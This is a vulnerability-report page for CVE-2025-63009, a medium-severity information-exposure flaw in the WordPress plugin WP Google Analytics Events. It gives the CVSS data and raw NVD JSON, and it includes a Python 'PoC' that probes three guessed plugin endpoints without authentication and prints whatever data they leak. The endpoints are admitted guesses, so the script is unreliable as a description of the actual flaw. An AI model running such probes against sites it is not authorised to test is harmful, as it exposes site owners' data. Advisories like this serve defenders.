Security Vulnerability Report
中文
CVE-2025-63009 CVSS 5.3 MEDIUM

CVE-2025-63009

Published: 2025-12-09 16:18:06
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in yuvalo WP Google Analytics Events wp-google-analytics-events allows Retrieve Embedded Sensitive Data.This issue affects WP Google Analytics Events: from n/a through <= 2.8.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

wp-google-analytics-events <= 2.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target = "http://target-wordpress-site.com" # The vulnerability allows unauthenticated access to sensitive data # Common vulnerable endpoints in WordPress plugins: endpoints = [ f"{target}/wp-content/plugins/wp-google-analytics-events/includes/api.php", f"{target}/?rest_route=/wp-google-analytics-events/v1/data", f"{target}/wp-admin/admin-ajax.php?action=get_gae_data" ] for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: print(f"[*] Potential sensitive data leak at: {endpoint}") print(f"[*] Response length: {len(response.text)}") print(f"[*] Response preview: {response.text[:500]}") except requests.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63009", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:06.310", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in yuvalo WP Google Analytics Events wp-google-analytics-events allows Retrieve Embedded Sensitive Data.This issue affects WP Google Analytics Events: from n/a through <= 2.8.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-google-analytics-events/vulnerability/wordpress-wp-google-analytics-events-plugin-2-8-2-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}